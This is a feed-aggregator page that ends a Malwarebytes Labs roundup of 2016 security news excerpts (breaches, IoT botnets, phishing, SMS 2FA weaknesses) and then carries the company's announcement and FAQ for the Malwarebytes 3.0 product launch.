  • Hackers Get Easy Route To Patient Data. “Patients are being put at risk because most NHS trusts are using an obsolete IT operating system that no longer receives security updates, researchers have warned. The trusts’ use of the old Windows XP system could enable hackers to steal patient data or take control of hospital infrastructure. Criminals have already used cyberattacks to hold hospitals to ransom and an NHS trust in Lincolnshire and East Yorkshire said this week that an attack in October led to the cancellation of more than 2,800 patient appointments, including operations.” (Source: The Times)
  • TAG Awards First Group of “‘Certified Against Fraud’ Seals to Companies Meeting Strict Anti-Fraud Standards. “The Trustworthy Accountability Group (TAG), an advertising industry initiative to fight criminal activity in the digital advertising supply chain, today announced the initial group of companies to complete the review process and be awarded the TAG ‘Certified Against Fraud’ Seal, showing they have met TAG’s rigorous anti-fraud standards. The initial recipients of the TAG “Certified Against Fraud” Seal include Amobee; comScore; DoubleVerify; Dstillery; Google; WPP’s GroupM; Horizon Media; Integral Ad Science; Interpublic Group; Moat; Omnicom Media Group; OpenX Technologies, Inc.; ProData Media; Rocket Fuel Inc.; Sovrn; and White Ops, Inc.” (Source: Street Insider)
  • The Security Gift Guide. “Even more than most IT professionals, security professionals are asked for advice on a regular basis. We are supposed to know not just about computers in general, but how people can protect themselves both online and in the real world. Whether it is getting a printer working, or if it is safe to shop online, we are expected to have the answers. At the same time, shopping for gifts can be problematic. You’re never sure what people have. Some people provide gift lists, which are great. But in the absence of a specific request, you might as well give people something useful that might make things easier for you. This guide can be useful even if you are not a security professional. Also remember that security is not just about stopping hackers, but about providing confidentiality, integrity, and availability in all forms.” (Source: CSO)
  • Corporate Data Left Unprotected In The Wild. “A new survey conducted by YouGov has highlighted the risks to corporate data from poor encryption, and employee use of unauthorised and inadequately protected devices. The survey of British office workers found that 42% use devices not provided by their employer to work with corporate e-mails and files. Half (52%) also use personal online accounts, such as Enterprise File Sharing Services (EFSS) to store or access work files – with only 34% saying they have never done so.” (Source: Help Net Security)
  • Small Businesses Underestimate The Cyber Threats Of Irresponsible Employee Actions. “Small companies (up to 50 employees) are significantly less concerned about employee activities leading to cybersecurity breaches than larger corporations. Only 36 per cent of small businesses worry about their staff’s carelessness while more than half of medium-sized and large enterprises consider it a major concern, says IT Security Risks Report 2016 by Kaspersky Lab. Uninformed or careless staff, whose inappropriate use of IT resources can put an organization’s cyberprotection in jeopardy, can harm businesses of any size. According to the survey, employee actions are among top three security challenges that make companies worldwide feel vulnerable. More than half (61 per cent) of the businesses experiencing cybersecurity incidents in 2016 admitted that careless and uninformed employee behavior has been a contributor.” (Source: Deccan Chronicle)
  • App Developers Not Ready For iOS Transport Security Requirements. “A month before Apple is expected to enforce stricter security requirements for app communications in iOS, enterprise developers don’t seem ready to embrace them, a new study shows. The study was performed by security firm Appthority on the most common 200 apps installed on iOS devices in enterprise environments. The researchers looked at how well these apps conform to Apple’s App Transport Security (ATS) requirements.” (Source: CSO)
  • Dailymotion Urges Users To Reset Passwords In Wake Of Possible Breach. “Breach notification service LeakedSource has added information about over 87 million Dailymotion users to its search index. The information includes 87+ million email addresses, user IDs, and over 18 million associated passwords. It was apparently stolen in a breach that happened around October 20, 2016. The passwords have been put through the bcrypt hashing algorithm, so they can’t be easily cracked. LeakedSource said they won’t attempt to crack them, but told Bleeping Computer that ‘a determined hacker who wants to crack one person’s hash may still be able to.'” (Source: Help Net Security)
  • Standards Body Warned SMS 2FA Is Insecure And Nobody Listened. “The US National Institute of Standards and Technology’s (NIST) advice that SMS is a poor way to deliver two factor authentication is having little impact, according to Duo Security. Last July NIST declared that sending one-time passwords to mobile phones was insecure. The organisation wrote in its advisory that the likelihood of interception makes TXT unreliable.” (Source: The Register)
  • Hackers Gamify DDoS Attacks With Collaborative Platform. “A Turkish hacking crew is luring participants to join its DDoS platform to compete with peers to earn redeemable points that are exchangeable for hacking tools and click-fraud software. The goal, security researchers say, is to ‘gamify’ DDoS attacks in order to attract a critical mass of hackers working toward a unified goal. The hacking platform is called Surface Defense and is being promoted in Turkish-language Dark Web forums including Turkhackteam and Root Developer, according to Forcepoint Security Labs, the security firm that first uncovered and reported the DDoS platform.” (Source: Kaspersky’s Threatpost)
  • Researchers Find Fresh Fodder For IoT Attack Cannons. “New research published this week could provide plenty of fresh fodder for Mirai, a malware strain that enslaves poorly-secured Internet of Things (IoT) devices for use in powerful online attacks. Researchers in Austria have unearthed a pair of backdoor accounts in more than 80 different IP camera models made by Sony Corp. Separately, Israeli security experts have discovered trivially exploitable weaknesses in nearly a half-million white-labeled IP camera models that are not currently sought out by Mirai.” (Source: KrebsOnSecurity)
  • Flash Exploit Found In Seven Exploit Kits. “A nasty Adobe Flash zero-day vulnerability that was remediated in an emergency update in October 2015 was thereafter co-opted by seven exploit kits, according to an analysis published today by researchers at Recorded Future. The Adobe vulnerability, CVE-2015-7645, was also used by the Russian APT group known as APT 28, which laced spear phishing emails with exploits targeting foreign affairs ministries worldwide. APT 28, also known as Sofacy, frequently targets NATO-allied political targets and in November was singled out by Microsoft for using separate Flash and Windows zero days in targeted attacks this year.” (Source: Kaspersky’s Threatpost)
  • Cybersecurity Gamification: A Shortcut To Learning. “Cybersecurity awareness trainings are usually a boring affair, so imagine my colleagues’ surprise when I exited the room in which I participated in a demonstration of the Kaspersky Interactive Protection Simulation (KIPS) game and told them: ‘You have to try this!’ This enthusiasm is apparently shared by the overwhelming majority of people who undergo one or more of the trainings that make part of Kaspersky Lab’s set of cybersecurity awareness products, game host Slava Borilin told me later.” (Source: Help Net Security)
  • What The Rise Of Social Media Hacking Means For Your Business. “A product marketing manager at your company just posted a photo on LinkedIn. The problem? In the background of the image, there’s a Post-It note that contains his network passwords. You can barely see it, but using artificial intelligence algorithms, hackers can scan for the publicly available image, determine there are network passwords, and use them for data theft. According to data security expert David Maynor, this is not rocket science. In fact, the AI program is easier to use than a search engine.” (Source: CSO)
  • Corporations Cite Reputational Damage As Biggest Cyber Risk. “Public businesses fear the possibility of losing customer or employee’s personally identifiable information (PII) and the subsequent brand-damage fallout more so than other risks, a new study published by the International Association of Privacy Professionals (IAPP) found. The IAPP Westin Research Center studied US Securities and Exchange Commission (SEC) Form 10-K disclosure statements from more than 100 publicly traded companies. The forms are where businesses share risk factors that could prove concerning to investors.” (Source: Dark Reading)
  • Law School Victim Of A Cyber Attack, Applicant Data Compromised. “The stress of applying to law school can be intense. The LSAT, the essay, the hassle of it all. Now there’s an additional stress factor — well, if you applied to the University of Wisconsin Law School in 2005-06. Last week Wisconsin Law experienced a cyber attack in which the personal information — including Social Security numbers — of 1,213 applicants from the 05-06 season was compromised. That’s a real… unexpected downside to applying to law school.” (Source: Above the Law)
  • Global Businesses In Firing Line As Hackers Target Christmas Gadgets. “F5 Networks (NASDAQ: FFIV) and Loryka today revealed the findings of a report examining the use of connected devices as cyber weapons by hackers. The report, entitled ‘DDoS’s Newest Minions: IoT Devices,’ was created by F5 Labs using data from F5 partner Loryka and shows that hackers are increasingly searching for products with network connectivity to manipulate for their own means. With one in three Brits set to give gifts leveraging the Internet of Things for Christmas this year, the influx of smart products will also provide a welcome present for hackers. The report, entitled ‘DDoS’s Newest Minions: IoT Devices,’ was created by F5 Labs using data from F5 partner Loryka and shows that hackers are increasingly searching for products with network connectivity to manipulate for their own means. With one in three Brits set to give gifts leveraging the Internet of Things for Christmas this year, the influx of smart products will also provide a welcome present for hackers.” (Source: IT Security Guru)
  • Phishing Malware August Lures Customer Service Staff. “A new malware-laden phishing campaign, dubbed August, has been detected targeting customer service and managerial staff at retailers, according to a new report from Proofpoint. The clever ploy spreads through an email arriving in the inboxes of targeted individuals with subject lines referring to supposed purchases via the company’s website. Recipients are specifically selected who are appropriate reps to deal with customer issues. The message further dupes recipients by saying more detailed information is contained in the attached document.” (Source: SC Magazine)
  • New Call To Regulate IoT Security By Design. “A Washington, D.C. think tank whose mission is critical infrastructure security has joined the call for lawmakers to consider regulating the security of connected devices. In a report published this week, the Institute for Critical Infrastructure Technology pinned the blame for a rash of Mirai malware-inspired IOT botnet DDoS attacks on manufacturer negligence. The report points out the lack of security by design in devices such as DVRs and IP-enabled closed circuit TV cameras that are protected by weak or known default credentials as the root cause for the emergence of these attacks. Further, they caution that the availability of the Mirai source code has brought these large-scale attacks within reach of script kiddies, criminals and nation-states alike.” (Source: Kaspersky’s Threatpost)
  • Russia Proposes 10 Year In Prison Sentence For Hackers And Malware Authors. “The Russian government has introduced a draft bill that proposes prison sentences as punishment for hackers and cyber criminals creating malicious software used in targeting critical Russian infrastructure, even if they have no part in actual cyber attacks. The bill, published on the Russian government’s website on Wednesday, proposes amendments to the Russian Criminal Code and Criminal Procedure Code with a new article titled, ‘Illegal influence upon the critical informational infrastructure of the Russian Federation.'” (Source: The Hacker News)
  • Your Public Facebook Posts Might Still Be ‘Private’ In UK Cops’ Eyes. “Cops are all over social media, using monitoring tools to keep tabs on sporting events, protests, and more. These tools often aren’t just about gathering public posts or tweets; sometimes, they’re used to scrape metadata in aggregate and map out somebody’s movements over time too. But according to the UK’s National Police Chiefs’ Council (NPCC), which coordinates police forces across the country, you might have a reasonable expectation of privacy over your social media posts, even if they are public.” (Source: Vice’s Motherboard)
  • Fingerprint Passwords Not Theft-proof. “It sounds like a great idea: Forget passwords, and instead lock your phone or computer with your fingerprint. It’s a convenient form of security — though it’s also perhaps not as safe as you’d think. In their rush to do away with problematic passwords, Apple, Microsoft and other tech companies are nudging consumers to use their own fingerprints, faces and eyes as digital keys. Smartphones and other devices increasingly feature scanners that can verify your identity via these “biometric” signatures in order to unlock a gadget, sign into web accounts and authorize electronic payments.” (Source: Longview News Journal)
  • Threats Of Tomorrow: Using AI To Predict Malicious Infrastructure Activity. “The ever-increasing scale and complexity of cyber threats is bringing us to a point where human threat analysts are approaching the limit of what they can handle. We believe the next-generation of cyber threats must be tackled by a combination of machines equipped with artificial intelligence (AI) and human analysts — what we call centaur threat analysts. One example of this is presented here: a new approach to forecasting malicious IP infrastructure by using machine learning.” (Source: Recorded Future)
  • Tighe: Insider Threat Is Never Going Away. “The insider threat is never going to go away.  This statement, echoed by many in government and directly by Vice Adm. Jan Tighe, deputy chief of naval operations for information warfare and director of naval intelligence, is a recognition that the insider threat problem is virtually impossible to defend against.” (Source: C4IRSNet)
  • Researchers Question Security In AMD’s Upcoming Zen Chips. “As more computing heads to the clouds, security researchers are questioning the security of virtual machine control panels called hypervisors. One of the first hardware-based solutions to address these concerns will be deployed by chip manufacturer AMD, called Secure Encrypted Virtualization. The feature is part of its upcoming x86 AMD Zen server family of microprocessors, slated to be released in the second quarter of 2017.” (Source: Kaspersky’s Threatpost)
  • Phishing From The Middle: Social Engineering Refined. “Phishing attacks have long been associated with malicious emails that spoof well-known institutions in order to trick users into coughing up credentials to banks accounts, email accounts, or accounts for major online services. Phishes that exploit the good name of trusted brands familiar to users have also been known to deliver ransomware, backdoors, and other malicious software designed to compromise the companies and organizations those users work for. Spoofing well known institutions and brand names is old hat, though, and users have become increasingly wary of emails claiming to hail from familiar companies and organizations. In response, the bad guys have been refining their use of social engineering, the key to any successful phishing campaign.” (Source: Spiceworks)
  • ‘We Could Not Deliver Your Parcel’ Email Could Be Scam. “As Christmas approaches, experts suggest an extra dollop of caution before clicking on email package delivery notices. Fake notifications are proliferating, bringing not holiday cheer — but holiday ransomware. The holiday phishing season began just before Thanksgiving and will likely extend until after Christmas, said Caleb Barlow, vice president for IBM Security.” (Source: USA Today)
  • Software Salesman Pleads Guilty To PoS Scam. “A Washington state man has pleaded guilty to wire fraud for selling revenue-suppression software (RSS) to hospitality and retail businesses for tax evasion purposes in a scam that cost the US government more than $3.4 million. The US Department of Justice (DoJ) says John Yin sold a software program called Tax Zapper that allowed users to portray inaccurate sales figures, thus lowering their tax obligations.” (Source: Dark Reading)
  • Child Porn On Government Devices: A Hidden Security Threat. “Daniel Payne, director of the Pentagon’s Defense Security Service, admitted this spring to encountering “unbelievable” amounts of child pornography on government computers. The comment came during an event in Virginia where military and intelligence officials gathered to address threats posed by federal workers. Mr. Payne, who spent much of his career in senior CIA and intelligence community roles before taking the Pentagon post, wanted to stress the value of monitoring employees’ systems to ensure they remained fit to handle top-secret information.” (Source: The Christian Science Monitor’s Passcode)
  • 15 Under 15: Rising Stars In Cybersecurity. “Kids born after the year 2000 have never lived a day without the internet. Everything in their lives is captured in silicon chips and chronicled on Facebook. Algorithms track how quickly they complete their homework; their text message confessions and #selfies are whisked to the cloud. Yet the massive digital ecosystem they inherited is fragile, broken, and unsafe. Built without security in mind, it’s constructed on faulty code: From major companies such as Yahoo to the US government, breaches of highly sensitive or personal files have become commonplace. The insecurity of the internet is injecting itself into presidential politics ahead of the November election. In the not too distant future, digital attacks may set off the next war.” (Source: The Christian Science Monitor’s Passcode)
  • Malaysia To Establish Cybersecurity Academy. “The Malaysian Digital Economic Corporation (MDEC) and Protection Group International (PGI) have signed an agreement to work together to develop a cybersecurity academy in Malaysia. It will be known as the UK-APAC Centre of Security Excellence and will see PGI and MDEC collaborate, generate and formulate awareness and strategies to regularly promote bilateral cybersecurity research and investment opportunities. PGI will provide strategic advice on the design of the academy’s cybersecurity courses, infrastructure and resources.” (Source: InfoSecurity Magazine)
  • Facebook Begins Asking Users To Rate Articles’ Use Of ‘Misleading Language’. “A survey asking users about “misleading language” in posts is the latest indication that Facebook is facing up to what many see as its responsibility to get a handle on the fake news situation. At least part of its solution, it seems, is to ask users what they think is fake. The “Facebook Survey,” noticed by Chris Krewson of Philadelphia’s Billy Penn, accompanied (for him) a Philadelphia Inquirer article about the firing of a well-known nut vendor for publicly espousing white nationalist views. (It’s a small town, everyone knows everyone.)” (Source: TechCrunch)
  • Nintendo Teams Up With HackerOne To Secure 3DS Via Bounty Program. “Security vulnerabilities are a nightmare for a console company.  Piracy and inappropriate content are particularly troublesome to Nintendo, so it’s teamed up with the web site HackerOne to find information on possible exploits of the 3DS platform.  This is being done by offering a bounty for any security issues found in that hardware family specifically, with rewards starting at $100 and going all the way up $20,000 for any major issues that are discovered.  The rewards are currently focused on discovering problems in the 3DS hardware or Nintendo-published titles, so vulnerabilities in, for example, the general eShop structure or exploits from bugs in non-Nintendo games would be exempt.” (Source: Hardcore Gamer)

Safe surfing, everyone!

The Malwarebytes Labs Team

Categories: Techie Feeds

Announcing Malwarebytes 3.0, a next-generation antivirus replacement

Malwarebytes - Thu, 12/08/2016 - 12:59

I am thrilled to announce the launch of our next-generation product, Malwarebytes 3.0! This product is built to provide comprehensive protection against today’s threat landscape so that you can finally replace your traditional antivirus.

Our engineers have spent the last year building this product from the ground up and have combined our Anti-Malware, Anti-Exploit, Anti-Ransomware, Website Protection, and Remediation technologies all into a single product which we simply call “Malwarebytes.” And it scans your computer 4 times faster!

With the launch of Malwarebytes 3.0, we are confident that you can finally replace your traditional antivirus, thanks to our innovative and layered approach to preventing malware infections using a healthy combination of proactive and signature-less technologies. While signatures are still effective against threats like potentially unwanted programs, large portion of our malware detection events already come from our signature-less technologies like our Anti-Exploit and Anti-Ransomware; that trend will only continue to grow. For many of you, this is something you already know, since over 50% of our customers already run Malwarebytes as their sole security software, without any third-party antivirus. But rest assured, we continue to support compatibility if you choose to use a third-party antivirus or other security software alongside Malwarebytes 3.0.

With the combination of our Anti-Malware ($24.95), Anti-Exploit ($24.95) and Anti-Ransomware (free, beta) technologies, we will be selling Malwarebytes 3.0 at $39.99 per computer per year, 20% less than our previous products combined and 33% less than an average traditional antivirus. But don’t worry, if you are an existing customer with an active subscription or a lifetime license to Malwarebytes Anti-Malware, you will keep your existing price and get a free upgrade to Malwarebytes 3.0. If you have both an Anti-Malware and an Anti-Exploit subscription, we will upgrade you to a single subscription to Malwarebytes 3.0, reduce your subscription price and add more licenses to your subscription. More on that below! As always, we will be keeping malware remediation absolutely free.

I am so excited about this product and its ability to replace your traditional antivirus. It’s something we’ve been working toward for many years, and something both our consumer and business customers have been asking for.

See Malwarebytes 3.0 in action by viewing this video. You can download Malwarebytes 3.0 by clicking this link.

If you have any questions, please read the FAQ below first and then ask away!

Marcin

 

Frequently Asked Questions

The complete Malwarebytes 3.0 Frequently Asked Questions can be found in our forums. Below is a selection of the most relevant FAQs.

So, I can replace my traditional antivirus?
Yes! As I said above, over 50% of our customers already have too. We believe in layered defense and built Malwarebytes 3.0 to provide the right mix of proactive and signature-less technologies to combat modern threats and zero-day malware. The combination of our Anti-Malware, Anti-Exploit, Anti-Ransomware, Website Protection, and Remediation technologies has you better covered against modern threats than the traditional antivirus companies that charge more for less effective protection.

Can I still run Malwarebytes alongside my Symantec, McAfee, etc.?
Certainly! We built Malwarebytes 3.0 to be compatible with all major antivirus software, even Windows Defender and Microsoft Security Essentials.

I’m an existing subscriber of Malwarebytes Anti-Malware. How much do I have to pay?
You don’t have to pay anything extra. Even though Malwarebytes 3.0 sells for $39.99, we are grandfathering ALL our existing customers at their original price. So if your subscription is currently $24.95, that is the price it will remain at, and you can get Malwarebytes 3.0 without having to pay anything extra. Your existing license key will work automatically with Malwarebytes 3.0.

I have a Malwarebytes Anti-Malware lifetime license. Will it work for Malwarebytes 3.0?
Yes! Simply install Malwarebytes 3.0 on top of your Malwarebytes Anti-Malware and your lifetime license will automatically apply to Malwarebytes 3.0.

Which Operating Systems does Malwarebytes 3.0 work under?
We continue to support all versions from Windows XP to Windows 10. Our Anti-Ransomware technology is only enabled on Windows 7 and higher.

How do I upgrade my Malwarebytes Anti-Malware to Malwarebytes 3.0?
Simply download and run the installer from here. Malwarebytes 3.0 will automatically upgrade Malwarebytes Anti-Malware 2.x to Malwarebytes 3.0 and apply its license key accordingly.

How do I upgrade to Malwarebytes 3.0 if I also have Anti-Exploit or Anti-Ransomware installed?
Simply download and run the installer from here. Malwarebytes 3.0 will automatically remove the old Anti-Malware, Anti-Exploit and Anti-Ransomware and upgrade them all to Malwarebytes 3.0.

I’m a business customer and I want Malwarebytes 3.0! When can I get it?
Small businesses that use the un-managed Malwarebytes Anti-Malware 1x or 2x versions can uninstall the old product and install the new Malwarebytes 3.0 Premium. The centrally managed Malwarebytes 3.0 will be shipping for business customers by early next year. We’re very excited about some really cool endpoint protection management technologies we have in the pipeline for our business customers.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds